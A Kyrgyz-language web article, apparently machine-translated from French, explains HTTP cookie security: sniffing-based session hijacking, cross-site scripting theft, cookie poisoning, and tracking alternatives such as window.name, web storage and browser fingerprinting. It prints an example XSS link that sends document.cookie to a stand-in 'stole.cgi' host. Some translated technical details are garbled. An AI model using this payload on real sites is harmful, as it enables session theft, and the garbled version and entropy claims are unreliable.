Cookie файлдары сеансты уурдоо деп аталган чабуулда пакеттик снайфер аркылуу уурдалышы мүмкүн. Тармактагы трафикти жөнөтүүчү жана кабыл алуучу компьютерлерден башка компьютерлер (айрыкча шифрленбеген коомдук Wi-Fi мейкиндигинде) кармап, окуй алат. Бул трафик жөнөкөй HTTP протоколу аркылуу сеанстар аркылуу жөнөтүлгөн кукилерди камтыйт. Тармак трафиги шифрленбегенде, зыяндуу колдонуучулар "пакет sniffers" аркылуу тармактагы башка колдонуучулардын байланыштарын окуй алышат.

Бул көйгөйдү HTTPS протоколун колдонуу менен колдонуучунун компьютери менен сервердин ортосундагы байланышты шифрлөө аркылуу чечсе болот. Сервер а белгилей алат коопсуз желек куки коюуда; браузер аны SSL байланышы сыяктуу коопсуз линия аркылуу гана жөнөтөт.

Бирок көптөгөн сайттар, колдонуучунун аутентификациясы үчүн HTTPS шифрленген байланышты колдонсо да (мисалы, кирүү баракчасы), кийинчерээк натыйжалуулук үчүн шифрленбеген HTTP туташуулары аркылуу сеанс кукилерин жана башка маалыматтарды кадимкидей жөнөтүшөт. Ошентип, чабуулчулар башка колдонуучулардын кукилерин кармап алып, аларды тиешелүү сайттарда көрсөтүп же куки чабуулдарында колдоно алышат.

Сайттагы скрипт: сервер менен кардар ортосунда гана алмашылышы керек болгон куки башка үчүнчү тарапка жөнөтүлөт.

Кукилерди уурдоонун дагы бир жолу - сайттарды скрипт кылуу жана браузердин өзү кукилерди эч качан кабыл албаган зыяндуу серверлерге жөнөтүү. Заманбап браузерлер серверден коддун изделген бөлүктөрүн аткарууга мүмкүндүк берет. Эгер cookie файлдары иштөө учурунда колдонулса, алардын баалуулуктары аларга кирбеши керек болгон серверлерге кандайдыр бир түрдө билдирилиши мүмкүн. Тармак аркылуу жөнөтүлгөнгө чейин кукилерди шифрлөө чабуулдун алдын алууга жардам бербейт.

Сайт ичиндеги скрипттин бул түрү, адатта, колдонуучуларга HTML мазмунун жарыялоого мүмкүндүк берген сайттардагы чабуулчулар тарабынан колдонулат. HTML салымына туура келген коддун бир бөлүгүн кошуу менен, чабуулчу башка колдонуучулардан кукилерди ала алат. Бул кукилерди билүү уурдалган кукилерди колдонуу менен ошол эле сайтка туташуу аркылуу колдонулушу мүмкүн, ошентип кукилери уурдалган колдонуучу катары таанылат.

Мындай чабуулдарды алдын алуунун бир жолу HttpOnly желегин колдонуу; бул PHP 6 версиясынан бери Internet Explorerдин 5.2.0-версиясынан бери киргизилген вариант, ал кукилерди скриптке жакын кардар үчүн жеткиликсиз кылуу үчүн пландаштырылган. Бирок, веб-иштеп чыгуучулар сайтты иштеп чыгууда муну эске алышы керек, алар сайтта скрипттерге каршы иммунитетке ээ болушат.

Колдонулган дагы бир коопсуздук коркунучу - бул сайтта суроо-талаптарды жасоо.

Расмий техникалык спецификация кукилерди алар келип чыккан домендеги серверлерге гана кайра жөнөтүүгө мүмкүндүк берет. Бирок, кукилердин мааниси cookie файлдарынын аталыштарынан башка каражаттарды колдонуу менен башка серверлерге жөнөтүлүшү мүмкүн.

Атап айтканда, JavaScript сыяктуу скрипт тилдерине жалпысынан кукилердин баалуулуктарына кирүүгө уруксат берилет жана Интернеттеги каалаган серверге ыктыярдуу маанилерди жөнөтө алышат. Бул скрипт түзүү мүмкүнчүлүгү колдонуучуларга башка колдонуучулар көрүү үчүн HTML мазмунун жарыялоого мүмкүндүк берген веб-сайттардан колдонулат.

Мисалы, example.com доменинде иштеген чабуулчу, башка жол менен көзөмөлдөбөй турган популярдуу блогду көрсөткөн төмөнкү шилтемени камтыган комментарий калтырышы мүмкүн:

<a href="#" onclick="window.location = 'http://exemple.com/stole.cgi?text=' + escape(document.cookie); return false;">Cliquez ici !</a>

Башка колдонуучу бул шилтемени чыкылдатканда, браузер коддун onclick атрибуту бөлүгүн аткарат, ошондуктан документ.cookie сабын ушул бет үчүн активдүү колдонуучу кукилеринин тизмеси менен алмаштырат. Ошондуктан, cookie файлдарынын бул тизмеси example.com серверине жөнөтүлөт, ошондуктан чабуулчу бул колдонуучунун кукилерин чогулта алат.

Колдонуучу тараптан чабуулдун бул түрүн аныктоо кыйын, анткени скрипт куки орноткон ошол эле доменден келет жана баалуулуктарды жөнөтүү операциясы ошол домен тарабынан уруксат берилгендей көрүнөт. Зыяндуу коддун жарыяланышына бөгөт коюучу чектөөлөрдү коюу сайттын ушул түрүн иштеткен администраторлордун милдети деп эсептелет.

Cookie файлдары HttpOnly желеги менен жөнөтүлгөн болсо, JavaScript сыяктуу кардар тараптык программаларга түз көрүнбөйт. Сервердин көз карашынан алганда, бир гана айырмачылык, Set-Cookie аталышынын сабында HttpOnly сабын камтыган жаңы талаа кошулат:

Set-Cookie: RMID=732423sdfs73242; expires=Fri, 31-Dec-2010 23:59:59 GMT; path=/; domain=.exemple.net; HttpOnly

Браузер мындай кукиди алганда, аны адатта төмөнкү HTTP алмашууда колдонушу керек, бирок аны кардар тарабында аткарылган скрипттерге көрүнбөйт. HttpOnly желек эч кандай расмий техникалык спецификациянын бөлүгү эмес жана бардык браузерлерде ишке ашырылбайт. Учурда XMLHTTPRequest ыкмасы менен сеанс кукилерин окууга жана жазууга бөгөт коюунун эч кандай жолу жок экенин эске алыңыз.

Мазмундун модификациясы: чабуулчу серверге жараксыз cookie файлын жөнөтөт, балким сервер жөнөткөн жарактуу кукиден жасалган.

Кукилерди сактоо жана серверге өзгөртүүсүз кайтаруу керек болгондо, чабуулчу кукилердин маанисин серверге кайра жөнөтүлгөнгө чейин өзгөртө алат. Мисалы, кукиде колдонуучу дүкөндүн корзинасына салынган нерселер үчүн төлөшү керек болгон жалпы нарк камтылса, бул маанини өзгөртүү серверди чабуулчуга баштапкы баадан азыраак төлөп берүү коркунучуна дуушар кылат. Кукилердин маанисин өзгөртүү процесси деп аталат печенье уулануу жана кол салууну туруктуу кылуу үчүн кукилерди уурдоодон кийин колдонулушу мүмкүн.

Cookie файлдарын жокко чыгаруу методунда чабуулчу серверге жараксыз cookie файлын жөнөтүү үчүн браузердин катасынан пайдаланат.

Бирок көпчүлүк веб-сайттар сеанс идентификаторун гана сактайт — сеанстын колдонуучусун аныктоо үчүн колдонулган кокусунан түзүлгөн уникалдуу сан — кукилердин өзүндө, калган бардык маалыматтар серверде сакталат. Бул учурда, бул маселе негизинен чечилет.

Ар бир сайттын өзүнүн кукилери болушу күтүлөт, андыктан бир сайт башка сайт менен байланышкан кукилерди өзгөртө же түзө албашы керек. Веб браузердин коопсуздук кемчилиги зыяндуу сайттарга бул эрежени бузууга жол бериши мүмкүн. Мындай кемчиликти пайдалануу, адатта, деп аталат сайттар аралык тамак даярдоо. Мындай чабуулдардын максаты сеанс ID уурдоо болушу мүмкүн.

Колдонуучулар веб-браузерлердин эң акыркы версияларын колдонушу керек, анда бул кемчиликтер дээрлик жок кылынган.

Кардар менен сервердин ортосундагы карама-каршы абал

Cookie файлдарын колдонуу кардардын абалы менен кукиде сакталган абалдын ортосунда карама-каршылыктарды жаратышы мүмкүн. Колдонуучу кукиге ээ болуп, браузердин "Артка" баскычын чыкылдатса, браузердин абалы жалпысынан бул сатып алуудан мурункудай эмес. Мисалы, эгерде интернет-дүкөндүн себети кукилердин жардамы менен түзүлсө, колдонуучу браузердин тарыхына кайтканда себеттин мазмуну өзгөрүшү мүмкүн эмес: эгерде колдонуучу өз себетине макала кошуу үчүн баскычты басып, "Кайтаруу" баскычын чыкылдатса. " баскычы, макала ушул бойдон калат. Бул, албетте, макаланы кошууну жокко чыгарууну каалаган колдонуучунун ниети болушу мүмкүн эмес. Бул ишенимсиздикке, башаламандыкка жана каталарга алып келиши мүмкүн. Ошентип, веб-иштеп чыгуучулар бул көйгөйдү билип, ушул сыяктуу жагдайларды чечүү үчүн чараларды көрүшү керек.

Туруктуу кукилер купуялык коопсуздук боюнча эксперттер тарабынан сынга кабылып, алардын мөөнөтү жакында бүтпөйт, ошону менен веб-сайттарга колдонуучуларды көзөмөлдөөгө жана убакыттын өтүшү менен алардын профилин түзүүгө мүмкүндүк берет. Cookie файлдарынын бул аспектиси да сеансты басып алуу көйгөйүнүн бир бөлүгү болуп саналат, анткени уурдалган туруктуу cookie бир топ убакыт аралыгында колдонуучунун кейпин кийүү үчүн колдонулушу мүмкүн.

Оку, ошондой эле: GAFAM: алар кимдер? Эмне үчүн алар (кээде) ушунчалык коркунучтуу?

Кукилерге альтернативалар

Кукилерди колдонуу менен аткарыла турган кээ бир операциялар кукилерди айланып өтүүчү же жок кылынган кукилерди кайра жаратуучу башка механизмдер аркылуу да аткарылышы мүмкүн, бул кукилерге караганда купуялык маселелерин (же кээде андан да жаман, анткени кийин көрүнбөйт) жаратат.

IP дареги

Колдонуучулар баракты чакырган компьютердин IP дареги менен байкоого болот. Бул ыкма World Wide Web киргизилгенден бери жеткиликтүү, анткени барактар ​​жүктөлүп алынгандыктан сервер браузерди же прокси иштеткен компьютердин IP дарегин сурайт, эгер эч ким колдонулбаса. Сервер колдонууда кукилер бар же жокпу, бул маалыматты көзөмөлдөй алат. Бирок, бул даректер, адатта, кукилерге караганда колдонуучуну аныктоодо анча ишеничтүү эмес, анткени компьютерлер жана проксилер бир нече колдонуучулар тарабынан бөлүшүлүшү мүмкүн жана бир эле компьютер ар бир иш сессиясында башка IP дарегин алышы мүмкүн (мисалы, телефон байланыштары үчүн көбүнчө с) .

IP даректери боюнча көз салуу кээ бир кырдаалдарда ишенимдүү болушу мүмкүн, мисалы, электр кубаты күйүп турганда, бир эле IP даректи узак убакыт бою сактаган кең тилкелүү туташуулар.

Тор сыяктуу кээ бир системалар Интернеттин анонимдүүлүгүн сактоо жана IP дареги боюнча көз салууну мүмкүн эмес же мүмкүн эмес кылуу үчүн иштелип чыккан.

URL

Такыраак ыкма URL даректерине маалыматты киргизүүгө негизделген. URL'дин суроо сап бөлүгү адатта ушул максат үчүн колдонулган бир техника, бирок башка бөлүктөр да колдонулушу мүмкүн. Эгерде кукилер иштетилбесе, Java серверлети жана PHP сеанс механизмдери бул ыкманы колдонушат.

Бул ыкма веб-серверди браузерге жөнөтүлгөндө аны алып жүргөн веб-баракчанын шилтемелерине сап сурамдарын кошууну камтыйт. Колдонуучу шилтемени аткарганда, браузер тиркелген суроо сапты серверге кайтарат.

Бул максатта колдонулган суроо саптары жана cookie файлдары абдан окшош, экөө тең сервер тарабынан тандалып алынган жана браузер тарабынан кайтарылган маалымат. Бирок, кээ бир айырмачылыктар бар: суроо сабын камтыган URL кайра колдонулганда, ошол эле маалымат серверге жөнөтүлөт. Мисалы, эгер колдонуучунун каалоолору URL дарегинин суроо сапында коддолсо жана колдонуучу ошол URL дарегин башка колдонуучуга электрондук почта аркылуу жөнөтсө, ал колдонуучу да ошол тандоолорду колдоно алат.

Башка жагынан алганда, колдонуучу бир баракка эки жолу киргенде, бир эле суроо сап эки жолу тең колдонулат деген кепилдик жок. Мисалы, эгер колдонуучу биринчи жолу сайттын ички барагынан бир бетке түшсө жана экинчи жолу сырткы барактан ошол эле баракка түшсө, сайттын барагына салыштырмалуу суроо саптары адатта башкача болот, ал эми кукилер бирдей .

Сурам саптарынын башка кемчиликтери коопсуздукка байланыштуу: суроо саптарында сеансты аныктоочу маалыматтарды сактоо сеанстарды бекитүү чабуулдарын, идентификатордун шилтеме чабуулдарын жана башка эксплуатацияларды иштетет же жөнөкөйлөтөт. Сеанс идентификаторлорун HTTP кукилери катары өткөрүү коопсузраак.

Жашыруун форма талаасы

ASP.NET тарабынан колдонулган сеанстарды көзөмөлдөөнүн бир түрү, жашыруун талаалары бар веб формаларды колдонуу. Бул ыкма маалыматты алып жүрүү үчүн URL суроо саптарын колдонууга абдан окшош жана ошол эле артыкчылыктар менен кемчиликтерге ээ; жана эгерде форма HTTP GET ыкмасы менен иштетилсе, талаалар форманы тапшырганда аны жөнөтө турган браузердин URL дарегинин бир бөлүгү болуп калат. Бирок көпчүлүк формалар HTTP POST менен иштетилет, бул форма маалыматын, анын ичинде жашырылган талааларды кошумча киргизүү катары кошууга алып келет, ал URL же куки эмес.

Бул ыкманын көз салуу көз карашынан эки артыкчылыгы бар: биринчиден, URL'ге эмес, HTML булак кодуна жана POST киргизүүгө жайгаштырылган маалыматка көз салуу орточо колдонуучуга бул көз салуудан качууга мүмкүндүк берет; экинчиден, колдонуучу URL дарегин көчүргөндө сессия маалыматы көчүрүлбөйт (мисалы, баракчаны дискке сактоо же электрондук почта аркылуу жөнөтүү үчүн).

window.name

Бардык жалпы веб-браузерлер DOMдин window.name касиетин колдонуу менен JavaScript аркылуу абдан чоң көлөмдөгү маалыматтарды (2МБдан 32МБга чейин) сактай алат. Бул дайындар сеанс кукилеринин ордуна колдонулушу мүмкүн жана ошондой эле бардык домендерде колдонулат. Техника кардардын сеанс өзгөрмөлөрүнүн татаал топтомун сактоо үчүн JSON объектилери менен айкалыштырылышы мүмкүн.

Кемчилиги - ар бир өзүнчө терезе же өтмөктүн башында бош window.name болот; өтмөктөрдү карап чыгууда (колдонуучу ачкан) бул өзүнчө ачылган өтмөктөрдүн терезе аты болбойт дегенди билдирет. Мындан тышкары, window.name купуялык маселесин жаратышы мүмкүн болгон ар кандай сайттардагы конокторду көзөмөлдөө үчүн колдонулушу мүмкүн.

Кээ бир жагынан бул сервердин катышуусу жок болгондуктан, кукилерге караганда коопсуз болушу мүмкүн, ошентип аны sniffer cookie файлдарынын тармактык чабуулдарынан кол тийбес кылат. Бирок, эгерде маалыматтарды коргоо үчүн атайын чаралар көрүлсө, ал андан аркы чабуулдарга дуушар болот, анткени маалыматтар ошол эле терезеде ачылган башка сайттар аркылуу жеткиликтүү.

HTTP аныктыгын текшерүү

HTTP протоколу кирүүнүн аутентификациясынын негизги протоколдорун жана колдонуучу логин жана паролду бергенде гана веб-баракчага кирүү мүмкүнчүлүгүн берген кирүү аутентификациясынын дайджестин камтыйт. Эгерде сервер веб-баракчага кирүү мүмкүнчүлүгүн берүү үчүн сертификатты сураса, браузер аны колдонуучудан сурайт жана алынгандан кийин, браузер аны сактайт жана бардык кийинки HTTP сурамдарына жөнөтөт. Бул маалымат колдонуучуну көзөмөлдөө үчүн колдонулушу мүмкүн.

Жергиликтүү жалпы объект

Эгерде браузерде Adobe Flash Player плагини камтылса, анда жергиликтүү жалпы объекттер кукилер сыяктуу эле максатта колдонулушу мүмкүн. Алар веб-иштеп чыгуучулар үчүн жагымдуу тандоо болушу мүмкүн, анткени:

  • жергиликтүү бөлүшүлгөн объект үчүн демейки өлчөмдөрдүн чеги 100 КБ;
  • коопсуздук текшерүүлөрү колдонуучунун кукилерин текшерүүдөн өзүнчө (ошондуктан кукилер жок болгондо жергиликтүү жалпы объекттерге уруксат берилиши мүмкүн).

Бул акыркы пункт, бул cookie файлдарын башкаруу саясатын Adobeнин жергиликтүү жалпы объекттеринен айырмалайт суроолорду жаратат колдонуучу өзүнүн купуялык жөндөөлөрүн башкарууга байланыштуу: ал анын cookie файлдарын башкаруусу локалдык жалпы объекттерди башкарууга эч кандай таасир этпей турганын жана тескерисинче билиши керек.

Бул системанын дагы бир сыны, аны веб-стандартты эмес, менчик болуп саналган Adobe Flash Player плагини аркылуу гана колдонууга болот.

Кардар тараптын туруктуулугу

Кээ бир веб-браузерлер скриптке негизделген туруктуу механизмди колдошот, бул баракчага маалыматты кийинчерээк колдонуу үчүн жергиликтүү түрдө сактоого мүмкүндүк берет. Мисалы, Internet Explorer браузеринин тарыхында, кыстармаларда, XMLде сакталган форматта же түз эле дискте сакталган веб-баракчадагы туруктуу маалыматты колдойт. Microsoft Internet Explorer 5 үчүн, DHTML жүрүм-турумдары аркылуу жеткиликтүү колдонуучу-маалымат ыкмасы бар.

W3C HTML 5ке Web сактагыч деп аталган кардар тарабынан берилиштерди сактоо үчүн жаңы JavaScript API киргизди жана кукилерди биротоло алмаштырууну көздөгөн. Бул кукилерге окшош, бирок кубаттуулугу абдан жакшыртылган жана HTTP сурамдарынын башында маалыматты сактабайт. API веб сактагычтын эки түрүн берет: локалдык сактагыч жана сеанс сактагыч, туруктуу кукилерге жана сеанс кукилерине окшош (сеанс кукилеринин мөөнөтү браузер жабылып турганда бүтөт. сеанстарды сактоо өтмөк жабылганда мөөнөтү бүтөт). Веб сактагычты Mozilla Firefox 3.5, Google Chrome 5, Apple Safari 4, Microsoft Internet Explorer 8 жана Opera 10.50 колдойт.

Башка механизм, адатта, веб-баракчалардагы JavaScript программаларын колдонуу менен браузердин кэшине (жаңылоонун ордуна эс тутумда) таянат. 

Мисалы, барак тегди камтышы мүмкүн . La première fois que la page se charge, le programme exemple.js est aussi chargé. 

Бул учурда, программа кэш эстутумунда калат жана кирген бет экинчи жолу жүктөлбөйт. Демек, эгерде программа глобалдык өзгөрмөнү камтыса (мисалы, var id = 3243242;), бул идентификатор жарактуу бойдон калат жана барак кайра жүктөлгөндө же программаны байланыштырган барак жүктөлгөндөн кийин башка JavaScript коду тарабынан пайдаланылышы мүмкүн. 

Бул ыкманын негизги кемчилиги JavaScript глобалдык өзгөрмө статикалык болушу керек, башкача айтканда, аны куки сыяктуу өзгөртүү же жок кылуу мүмкүн эмес.

веб браузер манжа изи

Серепчинин манжа изи – идентификациялоо максатында браузердин конфигурация орнотуулары жөнүндө чогултулган маалымат. Бул манжа издери кукилер өчүрүлгөн учурда да Интернет колдонуучуну же түзмөктү толук же жарым-жартылай аныктоо үчүн колдонулушу мүмкүн.

Негизги веб-браузер конфигурациясынын маалыматы адамдын веб-трафикин так өлчөө жана чыкылдатуу боюнча алдамчылыктын ар кандай формаларын аныктоо максатында веб-сайттын аудитория кызматтары тарабынан көптөн бери чогултулуп келген. Кардар тараптын скрипт тилдеринин жардамы менен, көбүрөөк так маалымат чогултуу болуп саналат азыр мүмкүн.

Бул маалыматты бит сапка айландыруу аппараттын манжа изин чыгарат. 2010-жылы Electronic Frontier Foundation (EFF) браузердин манжа изинин энтропиясын эң аз дегенде өлчөгөн. бит 18,1Бул энтропияга 5,7 бит кошулган кенеп манжа изин илгерилетүүгө чейин болгон.

Кыскача печенье

Cookie файлдары веб-браузер тарабынан веб-сайтка кирүүчүнүн катуу дискинде сакталган жана (башка нерселер менен катар) келүүчү же алардын сайт аркылуу саякаттоосу жөнүндө маалыматты жазуу үчүн колдонулган кичинекей текст файлдары. Вебмастер ошентип коноктордун адаттарын таанып, ар бир келүүчү үчүн өзүнүн сайтынын презентациясын жекелештире алат; анда cookie файлдары үй бетте канча макаланы көрсөтүү керектигин эстеп калууга же ал тургай кандайдыр бир жеке тараптын логиндик маалыматтарын сактап калууга мүмкүндүк берет: конок сайтка кайтып келгенде, ага өзүнүн атын жана паролду терүү зарылчылыгы болбой калат. таанылат, анткени алар кукиде автоматтык түрдө окулат.

Куки сайттын дизайнери тарабынан белгиленген чектелген мөөнөткө ээ. Алар ошондой эле браузердин жабылышына туура келген сайтта сессиянын аягында бүтүшү мүмкүн. Cookie файлдары коноктордун жашоосун жеңилдетүү жана аларга актуалдуураак маалымат берүү үчүн кеңири колдонулат. Бирок атайын ыкмалар конокторду бир нече сайттарда ээрчүүгө жана ошону менен анын адаттары боюнча өтө кеңири маалыматты чогултууга жана кайчылаш текшерүүгө мүмкүндүк берет. Бул ыкма кукилерди колдонууга коноктордун купуялуулугун бузган байкоо жүргүзүү ыкмасы катары репутация берди, бул тилекке каршы техникалык эмес себептерден улам же колдонуучунун күтүүлөрүн эске албаган көптөгөн учурларда чындыкка дал келет. .

Бул мыйзамдуу коркунучтарга жооп катары, HTML 5 кардар тарабынан берилиштерди сактоо үчүн жаңы JavaScript API киргизет, ал Web сактагыч деп аталат, ал бир топ коопсуз жана кукилерди алмаштырууга багытталган.

Cookie файлдарын сактоо

Кээ бир браузерлерде куки оңой түзөтүлөт, анын баалуулуктарын кол менен өзгөртүү үчүн Notepad сыяктуу жөнөкөй текст редактору жетиштүү.

Cookie файлдары браузерге жараша ар кандай сакталат:

  • Microsoft Internet Explorer ар бир кукиди башка файлга сактайт;
  • Mozilla Firefox бардык кукилерди бир файлда сактайт;
  • опера бардык cookie файлдарын бир файлда сактайт жана аларды шифрлейт (программалык опциялардан тышкары аларды өзгөртүү мүмкүн эмес);
  • Apple Safari анын бардык кукилерин бир .plist кеңейтүү файлында сактайт. Өзгөртүү мүмкүн, бирок сиз программалык камсыздоонун варианттарынан өтмөйүнчө, оңой эмес.

Браузерлерди колдоо керек минимум :

  • 300 бир убакта кукилер;
  • бир кукиге 4 o;
  • Хост же домен үчүн 20 куки.
[Бардыгы: 0 Мааниси: 0]

Жазылган Редакторлордун сын-пикирлери

Эксперттик редакторлор тобу өз убактысын продукцияны изилдөө, практикалык тесттерди өткөрүү, тармактын адистери менен маектешүү, керектөөчүлөрдүн сын-пикирлерин карап чыгуу жана бардык жыйынтыктарыбызды түшүнүктүү жана ар тараптуу кыскача жазуу менен өткөрөт.

Комментарий калтыруу

Электрондук почта дарегиңиз жарыяланбайт. Милдеттүү талаалар белгиленген *

Эмне деп ойлойсуң?

384 Points
Upvote көрүнөт